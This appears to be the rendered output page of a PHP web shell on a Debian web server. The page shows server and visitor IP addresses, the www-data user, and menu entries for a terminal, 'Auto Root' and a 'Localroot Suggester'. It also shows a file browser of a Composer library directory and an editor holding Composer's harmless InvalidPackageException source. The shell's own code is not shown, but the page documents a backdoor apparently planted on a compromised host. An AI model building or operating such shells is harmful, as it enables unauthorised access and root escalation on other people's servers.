Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.112
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
php /
Composer /
Package /
Loader /
Delete
Unzip
Name
Size
Permission
Date
Action
ArrayLoader.php
11.32
KB
-rw-r--r--
2016-11-03 17:43
InvalidPackageException.php
1001
B
-rw-r--r--
2016-11-03 17:43
JsonLoader.php
1.09
KB
-rw-r--r--
2016-11-03 17:43
LoaderInterface.php
834
B
-rw-r--r--
2016-11-03 17:43
RootPackageLoader.php
8.74
KB
-rw-r--r--
2016-11-03 17:43
ValidatingArrayLoader.php
17.61
KB
-rw-r--r--
2016-11-03 17:43
Save
Rename
<?php /* * This file is part of Composer. * * (c) Nils Adermann <naderman@naderman.de> * Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Composer\Package\Loader; /** * @author Jordi Boggiano <j.boggiano@seld.be> */ class InvalidPackageException extends \Exception { private $errors; private $warnings; private $data; public function __construct(array $errors, array $warnings, array $data) { $this->errors = $errors; $this->warnings = $warnings; $this->data = $data; parent::__construct("Invalid package information: \n".implode("\n", array_merge($errors, $warnings))); } public function getData() { return $this->data; } public function getErrors() { return $this->errors; } public function getWarnings() { return $this->warnings; } }